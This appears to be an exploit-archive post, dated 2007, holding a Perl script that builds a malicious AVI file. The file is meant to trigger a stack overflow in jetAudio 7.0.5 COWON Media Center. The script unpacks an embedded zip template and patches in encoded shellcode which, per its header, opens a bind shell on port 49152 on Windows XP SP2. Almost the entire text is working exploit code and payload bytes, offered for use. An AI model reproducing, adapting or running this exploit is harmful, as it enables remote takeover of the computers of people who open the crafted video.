jetaudio-overflow.txt
Posted on 19 December 2007
another vulnerable application. #!/bin/perl # # jetAudio 7.0.5 COWON Media Center MP4 Stack Overflow # # 0-day discovered and exploited by SYS 49152 # # Tested on win XP SP2 ENG # Shell on port 49152 # # usage: # - download the latest 3ivx codec from here: # hxxp://www.3ivx.com/codec/3ivx_MPEG-4_501_trial_win.exe # # - play the AVI file with COWON Media Center # # Maybe I will add more vulnerable apps if I have time. # SYS 49152 # # gforce(put the @ here)operamail(put the . here)com use Archive::Zip qw( :ERROR_CODES :CONSTANTS ); # begin binary data: $bin_data = # 3289 "x50x4Bx03x04x14x00x00x00x08x00xDAx6Cx91x37x9C". "x4Dx90x80x69x0Cx00x00x5CxC2x01x00x07x00x00x00". "x6Ax65x74x2Ex61x76x69xEDxD7x7Bx58xD4x55x1Ax07". "xF0x77x06xF0x82x97x47x4DxC1xACxA5x31xB4x2Cx03". "x61x00x05xB3x44x64xC0x4CxC4x2Bx78x41x6Cx60x46". "x19x61xB8xCCx0Cx20xA6x84x62x5ExC9xADxD0xD2x92". "x15x4Dx4BxCBxA7x52x2BxCDxB6xD4xA7xCCx28xA3xEC". "xAAx95xB6xD9x45x58xDAx52x22xCDx5BxEDxFBxCEx39". "x23xB8x3Dx7Bx79x9ExDDx67xFFxFAx7ExEAxF5x9CxF9". "xCDxEFx77x2ExEFx39xBFx33x4Ax44xA6x59x9ExB2xC2". "x94xE8x11x26x62x52x3Ax0BxA3xCDx0Ex77x81x53x3E". "x93xA1x2ExD8x59x50x50xC2xB5x3Cx67x49x8Ex4Dx2E". "xEDx4BxFBxC3xF9x03x39xD3xBEx23x32x4Ex21xBAx79". "x11x19x48xFEx6Fx75xD5x87xDFx7Fx8ExA7x7FxC9x48". "xD4xA5xD6xE3xB2xE6x72x3DxC3x93xEBxEDxB3xBDxF4". "xB9x2Fx2Dx44x5AxD2xADx71xBFx6Dx18xAExFCxF1x8F". "x17x5BxC5x5FxF5xA9xCBx30xA7xCDx61xE5x8AxC9x69". "x6Bx9Dx97xEAx63x7Bx22x75x9Ax42x93xDFxF0xDExD8". "x37xC7x96xE7xF2x3DxE5x2Ex28xCExA7xABx75xFExC9". "xE9xC8x9FxC5x95x6Ex6ExA7x6Ax48xEBx67x53xD7xAF". "xB7xB9xECxB3xF4x35x19x52xE7x62x57x9Ex49xD5x3B". "xEFx76x7BxB2xF2xB8x3ExDBxEDx71xFBx9Ex95x7BxD2". "x79x11xACx6Dx3Ex2Bx46xEAx26x05x0Fx4Fx44xD9xDD". "x36xB7x54xFCx2Ax2Ax2Ax6ExE4xD2x9FxCBx9ExF1xBD". "xC8x18x44xC6x61x5BxC9xD0xFCx4Ex00x5Fx31xF6xE8". "xD6x8Ex0Bx03xE7x95x7AxBBx3Dx1Ex77x6BxB3xC6x4F". "xF8x21xA9x0FxE0xEExB3xAFx74xA2xBAxECxA5xCBx50". "x8ExCExAAxDEx29x8FxEFx9Bx47x57xC8xF3xD4xFExFF". "x14xEFxF2x10x2Ex71xFCxC4x21xF5x5Dx1Cx1Fx71x6C". "xE7xA8xE0xE0x35x32x2CxD1xDFx6DxE6x78x8Ax63x07". "xC7xE3xFAxDExB5x1CxBCx67x0Dx3Cx7ExC3x06x8Ex2A". "x8ExA7x39x38xCDx86xF9x1CxEFxE9xCFx7FxE4x58xAF". "xE3x63x8Ex2Fx39x16x70xBCxCAx91xC1x91xC5xB1x5B". "xF7xC9xCBx6Ax48xE1x78x94x83xDFx11xC3x21x5Dx5F". "xACxEBx0Fx72x3CxC7xF1x08x07xE7xD7xB0x8AxA3x90". "x63x94xEAxDFx18xC8x65x19xC7x44x8Ex34xDDx56x14". "xC7x72x0Ex87xBExB7x98xC3xC3x91xC4x71x40xDFx7F". "x9CxE3x1Bx7Dx7Dx0CxC7x6Cx1Dx2Ex5DxCEx6Bx53xDA". "x74x3Bx32xEExFBx38xECxFAx3Ex99xFFx43x3Ax16x72". "x3CxC6xB1x93xE3x7Ex1Dx72x5DxC6xBDx9Ax54x2ExD7". "xEAxFAx33xFAx5ExC9xC7xD7x1Cx17x48xCDxF1x61x52". "xF3xE3x73xC3x9Bx17x5FxAEx64x9Cx8BxF4xB3x2FxE8". "xF2x45x8ExEFx39x4Ex70xACx21x35xBEx39xD4xBAx96". "x6Fx72xECx25x95x7Fx19xABxACxD1xEBx1CxF7xE8xF6". "xF9x1DxF4xE6x5BxD6x56xF2x54x4Ax6AxEDxA5xEDx7B". "x39xAAx49xE5xE9x0Bx8ExBFx92x5Ax4BxC9xA9x8Cx43". "xD6x77x2ExC7x36x8ExA5xFAx7Ex99xABxCCx21x87xD4". "x38xECxFAx79xC9xFDx3CxDDx47xDBx79xF1xD9x64x58". "xC6x51xCBxB1x55x97xF2x5CxB9xBEx3Fx5Fx7Fx96xFB". "x65x6Cx45xBAxCDx3Ax8ExCFx49x8Dx63xA1xEEx9FxDF". "x47x6FxBEx57x90xCAx97xB4x2Dx6BxE6xD2xEDx48x3E". "x64xDDx66xEBxE7x64x6FxC9x5Cx65x6Fx7Fx40x6Ax2F". "xCBxF5x55xFAxBExFBxF4x33xB2x37x64xDEx0Bx74xFB". "xF3x75xBBxF2x7Dx3DxA9x77x41xD6xC0xA9xFBx92xFB". "x65x8Cx32x66xB7xEEx5BxFAx9CxAExAFxF3xB3x7CxB0". "xA8xF5x92x79xCAxFCx72xDAxDCx3Bx5DxDFx2Fx39x93". "x9Cx4Ax1Ex7Cx63x9DxAFxEBxCBxF5x67x59xE7x3Dx1C". "x9Bx48x8Dx51xDAx94xB9xC8x78x66xE8x67xFFx46x6A". "x1DxA5x2ExEBx25x7BxA5x80xD4x7Bx24xE3x29xD2xFD". "xF8xE6x27xB9x7Cx5CxF7x25x73x91x1CxC8x1ExFAx5A". "xDFx2Bx21x6BxF1x29xA9xFDx2Cx7Bx45x72x26x7Bx44". "xF6x6Ex96xEEx47xE6x94xDBxE6x99x32xDDx5FxAExBE". "x5FxEEx95xF7xE4x49x8Ex07x48xEDx9Dx23xA4xE6x23". "x63x90x33xE4x15x52xEFx88xECxB1x4Ax8Ex93xA4xE6". "xCAx47xBDx37xD7x32x0Fx99x97xBCx53xB2x1Ex35xA4". "x72x20xE3x93xB1x1FxD4xEDx1Cx25xB5xB6x92x6Fx99". "xA3xACxB5xECx3Bx19x97xEFx7Dx3Ex4Cx2AxFFxF2xEC". "x6Cx7Dx5Dx4Ax59x57x99x8FxACxB9x8Cx5DxDExB1x1C". "xDDx77x81xFExECx5BxEBxA9xA4xD6x47xDAx90x31x96". "xE9xBAxECx6Dx19xBFx9Cx63x0FxEBx76x5ExE2x18x47". "x6AxEExD2xB6xE4x71x04xA9xF1x8Ex25xB5xC6xC3x49". "xE5x6Ax87xBEx16x47xEAx1Dx91x73xF8x0Ex8Ex3Bx39". "x9ExE7x88xD5xEDxCBxFCx27x93x5Ax17x99x13xFFxBD". "xC2x9BxCBx4Cx7DxBFxACxBDxBCx83x32xB7xC1xA4xF6". "x8Cx94x92x8Fx16x52xEBx2CxE7xA3xE4x21x9Ex63x1A". "xC7x8DxA4xC6x26xF9x1CxA0xFBx97x79x48x3ExE5x8C". "x95xFDx21xE7x9BxE4x72x8Ex7Ex56xEAx92x33xC9xCD". "x4Cx7Dx5Dx72x21x39x97x75x93xBDx55xA5xCBxFExA4". "xD6x58xEAxEFx93xCAxC5x0FxA4xCEx7Dx69x47xF2x29". "xE7x98xE4x61x0BxA9x33x4CxEEx29xD5x6DxFAxD6xF5". "x2Bx52x39x97x3Dx26xE7x9BxEFxCCx90x31xC8x1AxCA". "x79x65x21x75xDEx39xF5x73xF2xFDx42x7DxEDx01xDD". "x97x44x3FxFEx9DxBCxC8x25xFFx66x7Bx73x20x39x32". "x73x04x73x74xD0x63xB0xEBxE7x64xECx32xCExB7xF8". "xBDxE6xDFx76x6FxFEx64xDFxC8x39x24x7Bx4AxDEx53". "x59x4BxC9x93xE4x44x72x57xA0xFBx5BxA4x3FxCBxF8". "x25xAFxF2x1Ex4ExD5x6DxE7xE8x52xC6xE7x3Bx53x7C". "x67xD2x52x5Dx97xB5x9CxA6xEFxF5xEDx35xC9x75x2A". "xA9xBCx4Bx1ExB2x74x5DxBEx1FxABx3FxFBxCEx51x39". "x63x24x97x4ExDDx46xA5x6Ex53xD6x50x7Ex8Fx6ExE0". "x48xD0xEDxC9x6FxAAx1FxA9x39xC8x7ExFEx91x54x7E". "x24xCFx72x76x64xE8xF6x64x6FxCBxD9xF3x19xA9xDF". "xA7x51xBAx8DxD1xA4xE6x27xEFxC9x7CxFDx9CxEFxEC". "x59xA5xAFxCBxFExF0x9DxDFx32x0FxC9xCDx4Ax52xE3". "x2AxD6xDFx49x5Fx32x1FxC9x83xE4xEFx3ExFDx5CxAE". "x6Ex6Bx11xB5xBExBBx72xC6xC9xFBxEEx3Bx67x65xEC". "xB2x1ExEBxF4x73x95xFAx9Ax9Cx3DxF2xEExC8xDAxCB". "x79x22xEFx83xE4x60x95xEExC7xB7x77x65x2FxC9xFE". "x75xE8x48x27x35x1ExA7x8Ex7BxA9xF5x5Cx92x76x67". "xE9xBAxF4x25x6Bx51xAAx9Fx91x35x96xF1xFAx7Ex27". "x9CxD4x7Ax26x4BxEEx16xE9xCFxB3xF5x3Dx4ExBAx7A". "x2FxCCxD5xFDxCBx7DxBExB9x4Bx4Ex17xE8xFEx65xBC". "xFCx7Ex91xACxA1x8Cx49x7Ex53x8AxF5x73xFAx2CxA3". "xB3xA4xF2x29xFBx57xF6xB3x9Cx9BxB2x97x1ExD1xCF". "xF8xDEx5Fx69x5BxC6xE2x7BxBFx25x67x92xDFx25xD4". "x3Ax47x79x0Fx24x77xBExB5x5DxAExC7xE1xD6x7DxC8". "x38x17x52xEBx19xF5x98x7Ex5ExD6x46xCExFFx05x3A". "x2Ax74x3BxBExDFx73xABx6Ex2Fx87x5Ax7Fx1FxCBx74". "xBFx19xBAx2Ex39xCAxD3xEDxCBx67xC9x95xE4xB9x5C". "x7DxA6xF5x6Ex4Fx36x8FxDFx2Bx94xFFxEAx30x9CxE3". "x03xFExEBx54x3Cx19xDBx75x21x63xFFxF3x64x4Cx3C". "x41x46x7Bx26x19x97x2Ex23xE3xD6x51x64x7CxCBx48". "xC6x53xA7xC9xAFxFDx46xF2xBBxF9x04xF9x25xAFx24". "xBFx9Cx61xE4xB7x6Cx2DxF9x3Dx3Dx86xFCxDEx7Ex8A". "xFCx1Ax6Fx23xFFxF6xE7xC9xFFxA6x5FxC8x3FxF1x75". "xF2xB7x77x20xFFxC5xDDxC8x7FxE3x64xF2xDFx9Fx4F". "xFExC7x9BxC9xFFxD2x28x0AxE8xD3x40x01x43x23x29". "x60xCAx29x0Ax28xD9x49x01xABxABx28x60x57x1Ax05". "x7CxF0x25xFFxBCxF9x15xDBx3Cx56x3Ex76x2Fx3AxED". "x5Cx2Ax57xFDx3Bx89xFFx6DxE5xB2x16x16xE6xD1x15". "x86x5Dx8Dx0ExFExE7x03xFFx26xECxDDx96x6Fx75x72". "xB9xD3x66xF5x3Ex6Cx90xAFx53x4BxECx2Ex4FxB1xCB". "x6ExCAx2Ax33x4Dx9Cx3AxD1x14x1Dx17x19x63x36xCD". "x2Ax70x99xE6xD8x3Dx23x8Ax6Dx8Ex02xD3xC8xD4xF4". "xD4xB1xA6x14x3BxFFxB3xCDx34xD2x9ExEFxB1xBBx4C". "x5ExFEx49xF1xFCx5Fx45x27x55x34x5BxFEx7BxF1x96". "x71x96xE9x96xF8x91x1DxCEx7Bx96x35x0DxACxABx6C". "x7CxFExD8x0FxC7x3CxFDx5AxA6x2Fx74x5FxF3xE6xB4". "xF5x1Bx2Bx9Bx2Ex9Dx6Cx19x1Ax51xFAx7DxF8x13xD9". "x99x71x43x83xDFx3Dx59x1ExFCxCDx85x23x7FxD9xFC". "xDAx74xF7xADxCBx13x82x7FxFDx6Ex7Ax69x43x4Ax7E". "x70xEDx80xDCx8CxD8x39x6Bx4Bx27x5FxEExBAx67xF9". "xAEx7DxC1xBFx9Ex9Cx5Ex7Ax28x25xEDxD3x5BxD7x25". "xD5x8Cx3Ex58x12x3CxE0xE9xF2x8AxFDx01xB9xC9x07". "x53xAExDDx7ExEBx92xB4xE0x23x9Fx9Dx0BxFExAAxDE". "xBFx65xD0xB2x49x85x67xE2xAAx2Ex34xD7x9Ax9FxAB". "x7Ex36xECxC7xEAx75x5DxB3x8Bx9Ex7DxA8x68xC6xE5". "xC0xECxD2x75x27x32x3Ex3ExF0x78xDAxF6x43x1Fx96". "x1Dx4AxDExBDxFAx89xEAx88x3Fx65x06x99x2Dx5BxA3". "xCExBDx93xD9xADxE3x7BxCDx6Bx3Ax7ExD9x7Cx7FxC7". "xECxA2x5Ax73xC6xC6xDAx8ExBDxE2x27x9Ax63x5Fx79". "xA9x86xBFx8BxA8x3Ax5DxBDx65x4Cx5DxD6xB9x9DxA3". "x1ExDAx32xBAx59xEAxA1xD7xF4x69xE0xFAx99x87xBB". "xD6x65x06xD5xB5x24xEDx5BxFFxEDxD9xB8x2AxAEx0F". "x3Bx7BxB0xD6xFCxDBxE1xD4x7Dx67xCFx6Cx70x8Fx1B". "xD0x37xE2xE8x80x7ExB9x19x13xF2x36x9FxA8x8AxED". "xFDxBCxF9x6ExD3xE6x40xE7x99x96x0Fx63x1Bx57x64". "xEEx0AxC9x2ExADxE9x52x7FxFAxD1x4Ex67x6Bx1FxED". "x54x77x3Ax6Ex45x4BxE7x1Bx66x4Ex68x8ExABx3Ax9B". "x19xE7xCCx2Ex4AxE9x72xCFx8DxC6x3BxB3x4Bx57x73". "x7FxB7xACx9Ex7Fx60xCDx96xD1x99x41x9CxC4xEBxFF". "xDDx2AxFCx33x23x13x2DxAFx15x8DxB2x8CxB7x4CxB1". "x04x74x35x58xC2x0Cx06x5ExB0x8Ax4AxFEx83x8Bx0E". "xAAx38xAAx8Ax78x55xACx50x45x85x2Ax8Ax55xE1xAF". "x8Ax4ExAAx68xB6x8CxE1xA2xD5x44x6Ex7FxD6xFEx95". "x7Ax0Fx4CxE5xEDx10x75xF5x3ExD8x6AxF9x79x8Fx77". "x1Fx4Cx1Ax14xF2x73xFCx9Fx03x93xD3xFBx97x7Fx54". "x65x2DxBFxBCxBAx7ExF9xABxEFx27xF6x89x3Ax35xA3". "xFCxD4xB2xC4x90x33xA1x45xE5x2Fx27x79x62xFAxFA". "x1Fx88x39xFCxDCxE2xE1x2Fx6Ex5Bx1Ax32xA6xBAxFB". "x91x07x8FxD7x96x9FxAAx4Ax0Cx39x11x7AxD7x6Bx51". "xE7xA6xB6x4Cx7CxC6x51x1ExF9x86xB5xF1x58xAEx27". "xFCx8BxD0x76x07xA3x1AxEEx2Ax7FxEBx85x86xF2x5F". "x6AxAFxABx19xFCxDDxDDxD7x36xA4x57x57x37xD5x87". "xBDxB9x62xBFx79xC9x8Ax73xDDx03x73xF6xAFxEAx9D". "x58xDDx2Bx30xFFxDCxE1x6Ex27x6ExD9x7Ax79xEFxE5". "x41xE7x92xE7x86xDDxB6x63x46xC3xA6xE4xF2xA0x27". "x9Bx2Ex06xBDxD4xD4x14x14x98x53x1Fx16xB3xA7x3E". "x68xFExD4x3BxC2xC6x6Fx3AxBAx88xBFx1BxF4x6DxE3". "xE5xBDxFDxDFxEFxDCxF0xF9xF8xDFxF6x86x36x49x3D". "xA5xB3xFBx0CxD7x1Bx2Ex75xAFx4Dx9ExFBx49xCDxCC". "x23x95x55x3FxA6x57x73x3Dx74xC3x17xF5x61x8Fx7C". "xDCxB7x76x43xC3x99xBCxB8xC8xD4x41x3Bx22x47x7B". "x62xEEx36xBExB2x7Bx4Dx5AxFBx63x03xFBx0Fx7FxF7". "x1AxBFx1Fx6AxDEx4Ex3BxFBx75xF2x71x43x60xFEx4F". "x3Dx9Ex6Ax3CxDFx73xC3xCBxE7x7BxD6x36xA6xAFxA9". "xE9x55x14x7Fx7Bx53x7AxF5x86xE4x74x57x60x4Ex68". "x8Fx8ExB7xE7xF5x0DxCCxBFxC0xFDx25xAFxECx75xF4". "xE2xDExD0xE4xB9x9CxC4xE2x75xEBxD6x25x01x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "xFCx0Fx59x2Cx96x48x22xBAx69xDBx88x09x93xB8x0C". "xB1x59x3Dx56x2Ex0Dx1Cx34xCEx31x6Fx9Ex23xDBxEA". "x29x30x25x39x4AxECx7CxC1xB4xCDx9Ax97xC5x65xEF". "xB6x77xA5x96xD8x5DxB6x02xB7x7CxDFx67x76xBEx4B". "xCAx1ExFAx7BxA5xABx3CxE9x71xE5xE6xB7x79xD2xC7". "x40x5DxBCx65x88xCDxE1xCExE5x32xE8x77xDFx4Bx1F". "xD7x6FxB3x59xCBxB8xECxD9xB6x5Fx73x44x44x04x17". "xD7x66x17x3AxF2xB8xECxAExBFxEBxE5x7Bx34x6Ex9B". "xA7xA0x80xCBxC8xB6x0Fx39x26x15xE7xDBxDDxA6x92". "xE8xF0x21xE1x91xE1x51x11xB7x99xC6x17x3BxB2x73". "x27x39x9Cx76xD3xE0xF0x98x70x33xDFxB3x29x8Cx49". "xAFx4ExBBx55xC6x4CxD9x05xCEx70x6Bx61x61x9Ex3D". "x5Cx3Dx2Ex23xC9xB7x3AxEDxBEx06xC7xA6x4Ex48xE1". "xEAx9CxB6x1Dx99x22xBCx86x44x5Fx5Dx89x1Cx1Cx11". "xA5xAExC4x59x22x54x25x36x5AxDFx33x24xC2xECxAD". "x44xC5x24x24xA9x4AxE4x10x75x4FxA4x39x2Ax51x57". "x62xA2xB9xF1xB2xFFx60x84xD7xB5x1DxA1xDDx3Dx73". "x64x62x62xC2xCCxBBx12xE5xABxA1x6Dx07x1Ax19x35". "x30xC9x92x38x38x76x88x39xC9x92x10x93x60x4Ex4A". "x88x4Ex88x1Dx11x1Dx39x38x3AxD6x62x8Ex88x4Ex1A". "x3Cx22x61x60x5Cx44x6CxACx99x3Bx6ExF7xEDx2Cx97". "x9Dx1BxFDx3Bx50x4Bx01x02x14x0Bx14x00x00x00x08". "x00xDAx6Cx91x37x9Cx4Dx90x80x69x0Cx00x00x5CxC2". "x01x00x07x00x00x00x00x00x00x00x00x00x20x00x00". "x00x00x00x00x00x6Ax65x74x2Ex61x76x69x50x4Bx05". "x06x00x00x00x00x01x00x01x00x35x00x00x00x8Ex0C". "x00x00x00x00"; # end binary data. size = 3289 bytes my $shellcode = # code jet "x33xC9x83xE9xB0xD9xEExD9x74x24xF4x5Bx81x73x13". "xA8x45xF5xB8x83xEBxFCxE2xF4x54x2Fx1ExF5x40xBC". "x0Ax47x57x25x7ExD4x8Cx61x7ExFDx94xCEx89xBDxD0". "x44x1Ax33xE7x5Dx7ExE7x88x44x1ExF1x23x71x7ExB9". "x46x74x35x21x04xC1x35xCCxAFx84x3FxB5xA9x87x1E". "x4Cx93x11xD1x90xDDxA0x7ExE7x8Cx44x1ExDEx23x49". "xBEx33xF7x59xF4x53xABx69x7Ex31xC4x61xE9xD9x6B". "x74x2ExDCx23x06xC5x33xE8x49x7ExC8xB4xE8x7ExF8". "xA0x1Bx9Dx36xE6x4Bx19xE8x57x93x93xEBxCEx2DxC6". "x8AxC0x32x86x8AxF7x11x0Ax68xC0x8Ex18x44x93x15". "x0Ax6ExF7xCCx10xDEx29xA8xFDxBAxFDx2FxF7x47x78". "x2Dx2CxB1x5DxE8xA2x47x7Ex16xA6xEBxFBx16xB6xEB". "xEBx16x0Ax68xCEx2Dx35xB8xCEx16x7Cx59x3Dx2Dx51". "xA2xD8x82xA2x47x7Ex2FxE5xE9xFDxBAx25xD0x0CxE8". "xDBx51xFFxBAx23xEBxFDxBAx25xD0x4Dx0Cx73xF1xFF". "xBAx23xE8xFCx11xA0x47x78xD6x9Dx5FxD1x83x8CxEF". "x57x93xA0x47x78x23x9FxDCxCEx2Dx96xD5x21xA0x9F". "xE8xF1x6Cx39x31x4Fx2FxB1x31x4Ax74x35x4Bx02xBB". "xB7x95x56x07xD9x2Bx25x3FxCDx13x03xEEx9DxCAx56". "xF6xE3x47xDDx01x0Ax6ExF3x12xA7xE9xF9x14x9FxB9". "xF9x14xA0xE9x57x95x9Dx15x71x40x3BxEBx57x93x9F". "x47x57x72x0Ax68x23x12x09x3Bx6Cx21x0Ax6ExFAxBA". "x25xD0x47x8Bx15xD8xFBxBAx23x47x78x45xF5xB8"; # end binary data. size = 344 bytes open(code, ">jet.zip") || die "Can't Write temporary File "; binmode (code); print code $bin_data; close (code); print " Temporary file ready, patching.. "; my $zip = Archive::Zip->new(); $zip->read( 'jet.zip' ) ; $zip->extractMember( 'jet.avi' ); open(code, "+<jet.avi") || die "Can't Open temporary File "; binmode (code); seek code,4395,0; print code $shellcode; close (code); print "Shellcode added, have fun! ";
